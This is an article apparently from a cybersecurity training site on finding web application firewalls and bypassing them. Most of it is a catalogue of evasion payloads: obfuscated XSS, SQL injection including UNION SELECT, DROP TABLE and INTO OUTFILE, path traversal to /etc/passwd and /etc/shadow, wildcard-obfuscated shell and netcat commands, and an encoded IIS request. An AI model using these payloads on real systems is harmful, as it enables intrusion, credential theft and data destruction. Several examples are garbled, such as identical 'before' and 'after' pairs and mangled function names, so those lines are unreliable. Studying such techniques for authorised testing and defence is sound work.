The term web application firewall (WAF) refers to a set of monitoring tools and filters designed to detect and block network attacks against a specific web application. According to pentesting experts at the International Institute of Cyber Security (IICS), these are security tools that, in real time, decide whether to allow or deny access to an online deployment.
Like any other security solution, a WAF is only a complementary solution for a comprehensive security environment, so it must be implemented along with other elements such as incident monitoring tools or anti-fraud systems.
A pentesting process against a WAF allows researchers to determine the real IP address of the target and, at later stages, try to evade this protection mechanism. The WAF compromise allows researchers (and also hackers) to know what’s behind these implementations.
Pentesting experts consider that nearly 50% of WAF implementations are vulnerable to one or more evasion methods, as hackers have made great strides in attack variants to these solutions, primarily by delivering malicious payloads disguised as legitimate software.
On this occasion, we will show you some techniques and tools to analyze a WAF and evade these security measures. As usual we remind you that this article was prepared for informational purposes only, so IICS is not responsible for the misuse that may be given to the information contained herein.
HOW TO DETECT A WAF?
There is a general process for finding the actual IP of a target website:
- Employ shodan.io or censys.io
- Search SPF records and TXT records
- SPF and TXT records can be the IP address of the entry point without CloudFlare
- You can also view securitytrails.com in historical data that can show the original IP in old records
To check if a WAF is configured correctly, pentesting experts recommend relying on the following indicators:
- A WAF uses standard ports 80, 443, 8000, 8008, 8080, and 8088
- A WAF sets its own cookies on requests
- A WAF is associated with individual headers
- A WAF responds with unique response codes to malicious requests
To verify the proper configuration of these devices, experts can:
- Send a standard GET request from the browser, intercept and write the response headers
- Send a request from the command line (such as cURL) and then verify the content and headers of the response
- Send GET requests to random open ports and search for banners that can reveal the WAF provider
- Try some SQL injection payloads like: “o1 =1 – to try to log in
- Use XSS payloads such as <script>confirm() </script>in some input fields
- Add .. /.. /.. /etc/passwd to the random parameter in the URL
- Add some payload like ‘OR SLEEP(5)OR’ to the end of URLs for any random parameters
- Send GET requests with legacy protocols such as HTTP/0.9 (HTTP/0.9 does not support POST requests)
- Check the server header to see the different types of interactions
- Send the raw generated FIN &RST packet to the server and define the response
WAF HACKING TOOLS
Most hackers use automated tools to speed up web application firewall evasion processes. Below is a small list of the most popular tools for these activities; its use is only the first step in verifying how much information an attacker will be able to access.
- w3af: A framework for auditing and attacking web applications
- wafw00f: Tool to find digital logging and WAF authentication
- BypassWAF: Used to evade these security mechanisms using DNS history. this tool will search for old dns records and check if the server is responding for this domain
- CloudFail: A tactical recognition tool that attempts to find the original IP address behind Cloudflare’s WAF
There are many other tools, but pentesting experts claim that these are the most popular.
WAF EVASION
Below we will review some of the best known WAF bypassing techniques.
Case switch technique
It consists of the combination of uppercase and lowercase characters.
Basic request payload:
<ScrIpT>confirm()</sCRiPt>
Bypassing technique:
<ScrIpT>confirm()</sCRiPt>
Basic request:
SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
Bypassing technique:
sELeCt *fRoM*wHerE OWNER='NAME_OF_DB'
Example in URL:
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4
URL encoding technique
Pentesting experts can also modify a normal payload with %encoding/ URL. For this technique you can use Burp Suite, which has a built-in coding and decoding tool.
WAF-blocked payload:
<Svg/x=">"/OnLoAD=confirm()/
Bypassing technique:
%3CSvg%2Fx%3D%22%3E%22%2FOnLoAD%3Dconfirm%28%29%2F%2F
WAF-blocked payload:
UniOn(SeLeCt 1,2,3,4,5,6,7,8,9,10)
Bypassing technique:
UniOn%28SeLeCt+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%29
Example in URL:
https://example.com/page.php?id=1%252f%252a*/UNION%252f%252a /SELECT
Unicode technique
ASCII characters provide us with excellent solutions to evade a WAF. Encode the entire payload or just one fragment for satisfactory results.
Basic request:
<check onstart=prompt()>
Obfuscation:
<check onstart=pru06fmpt() >
WAF-blocked code:
/?redir=http://google.com
Bypassing technique:
/?redir=http://google。 com (Unicode)
WAF-blocked code:
<check loop=1 onfinish=alert()>x
Bypassing technique:
<check loop=1 onfinish=alert(1)>x (Unicode)
Basic request:
.. /.. /etc/shadow
Obfuscation:
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFshadow
HTML presentation
According to pentesting experts, web applications encode special characters in HTML; encoding and rendering, respectively basic cross-sectional cases with numeric and general HTML encoding.
Basic request:
"><img src=x onerror=confirm()>
Encoded payload:
"><img src=x onerror=confirm()>
Encoded payload:
"><img src=x onerror=confirm()>
Mixed coding techniques
These rules tend to filter a particular type of encoding. These filters can be omitted using the combined encoding payload, using new lines and tabs and increased obfuscation.
Obfuscated payload:
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
Comment technique
Sometimes hackers often hide standard payload vectors in code comments, pentesting experts mention. Different payloads have different obfuscation methods.
WAF-blocked code:
<script>confirm()</script>
WAF Evasion:
<!--><script>confirm/**/()/**/</script>
WAF-blocked code:
/?id=1+union+select+1,2—
WAF Evasion:
/?id=1+un/**/ion+sel/**/ect+1,2—
Attackers can also insert comments in the middle of the lines of attack. For example, / *! SELECT * / can be ignored by the WAF implementation, but passed to the target application and processed by the MySQL database.
Example in URL:
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#
Example in URL:
index.php?page_id=-1 /*! UNION*/ /*! SELECT*/ 1,2,3
Double encoding method
WAF filters typically encode characters to protect a web application. Poorly designed filters can be evaded with relative ease using double coding, say pentesting experts.
Basic request:
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:
Obfuscated payload:
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:
Basic request:
<script>confirm()</script>
Obfuscated payload:
%253Cscript%253Econfirm()%253C%252Fscript%253E
Template obfuscation
Several command-line utilities use templates to work with multiple files globally. We can change these templates to run system commands.
Basic request:
/bin/cat /etc/passwd
Obfuscated payload:
/??? /?? t /??? /?? ff??
Characters used:
/ ? t s
Basic requests:
/bin/nc 127.0.0.1 443
Obfuscated payload:
/??? /n? 2130706433 443
Characters used:
/ ? n [0-9]
Dynamic loading technique
Programming languages have different templates and syntax for concatenation. According to pentesting experts, this allows you to create payloads that can evade various filters and rules.
Basic request:
<script>confirm()</script>
Obfuscated payload:
<script>eval('con'+'fi'+'rm()')</script>
Basic request:
/bin/cat /etc/shadow
Obfuscated payload:
/bi'n'''/c''at' /e'tc'/sh''ad'ow
Bash allows the concatenation of paths for execution.
Basic request:
<iframe/onload='this["src"]="javascript:confirm()"';>
Obfuscated payload:
<iframe/onload='this["src"]="jav"+"as	cr"+"ipt:con"+"fir"+"m()"';>
Junk character technique
These are simple payloads easily filtered by WAF. In some cases, adding some unwanted characters helps avoid detection, allowing pentesting experts to obfuscat regular expression firewalls.
Basic request:
<script>confirm()</script>
Obfuscated payload:
<script>+-+-1-+-+confirm() </script>
Basic request:
<BODY onload=confirm()>
Obfuscated payload:
<BODY onload!#$%&()*~+-_.,:;? @[/|]^'=confirm()>
Basic request:
<a href=javascript;alert()> ClickMe
WAF Evasion:
<aa aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
Line break technique
Much regular expression filtering WAF effectively blocks multiple attempts. The line break technique (CR and LF) can break the firewall’s regular expression to bypass security measures.
Basic request:
<iframe src=javascript:confirm(hacker)">
Obfuscated payload:
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hacker)">
Invalid uninitialized variable technique
Regular expression filters can be omitted by using uninitialized bash variables. This value is zero and acts as empty strings. Bash and Perl allow such interpretations.
- First-level obfuscation: Normal
Basic request:
/bin/cat /etc/shadow
Obfuscated payload:
/bin/cat$u /etc/shadow$u
- Second-level obfuscation: Position-based
Basic request:
/bin/cat /etc/shadow
Obfuscated payload:
$u/bin$u/cat$u $u/etc$u/shadow$u
- Third-level obfuscation: Random characters
Basic request:
/bin/cat /etc/passwd
Obfuscated payload:
$aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
Tabs and line break
Tabs are often used to bypass firewalls, especially those based on regular expressions. Tabs can help break a WAF regular expression when the regular expression expects spaces instead of tabs.
Basic request:
<IMG SRC="javascript:confirm();">
Bypassing technique:
<IMG SRC=" javascript:confirm();">
Variant:
<IMG SRC=" jav ascri pt:confirm ();">
Basic request:
http://test.com/test?id=1 union select 1,2,3
Bypassing technique
http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
Basic request:
<iframe src=javascript:confirm()></iframe>
Obfuscated payload:
<iframe src=j	a	v	a	s	c	r	i	p	t	:c	o	n	f	i	r	m	%28	%29></iframe>
Token Breakers
Token attacks are based on trying to break the logic of splitting a request into tokens using means of token protection, pentesting experts say. Token breakers are tokens that allow you to influence the correspondence between a string element and a specific token. Our request must remain valid when using token crackers.
Our payload:
?id='-sqlite_version() UNION SELECT passwords FROM users –
Example: unknown context for the pentester.
First payload:
?id=12);D ROP TABLE users –
Second payload:
?id=133) INTO OUTFILE 'xxx' –
Obfuscation technique in other formats
Many web applications support different types of encoding and can interpret it. We will always need to obfuscat the payload in a non-WAF-compliant format, but the server can forward our payload.
IIS case:
IIS 6, 7.5, 8, and 10 can be interpreted as IBM037.
Send parameters encoded with:
- Original request:
POST /example.aspx?id7=sometext HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 27
id2='union all select * from users—
- Obfuscated request with URL encoding:
POST /example.aspx?%89%84%F7=%A2%95%94%86%A3%88%89%95%87 HTTP/1.1
HOST: target.org
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 127
%89%84%F2=%7D%A4%95%89%97%95%40%81%93%94%40%A2%85%93%85%84%A3%40%5C%40%86%99
Finally, pentesting experts have a number of useful tips during these safety tests:
- Always try to address the problem as comprehensively as possible
- Try different coding techniques. Depending on the case, some might work better than after
- Take the time to verify your DNS records, as only then will you be able to find errors successfully
- Don’t forget that any protection on web resources can be bypassed and WAF is not a panacea for all the problems faced by an online application
- Hackers don’t rest and are always looking for new methods to take control of affected resources, so the cybersecurity community can’t rest either
For further reports on vulnerabilities, pentesting, exploits, malware variants, cybersecurity risks and information security courses fell free to visit the International Institute of Cyber Security (IICS) websites, as well as the official platforms of technology companies.
Cyber Security Specialist with 18+ years of industry experience . Worked on the projects with AT&T, Citrix, Google, Conexant, IPolicy Networks (Tech Mahindra) and HFCL. Constantly keeping world update on the happening in Cyber Security Area.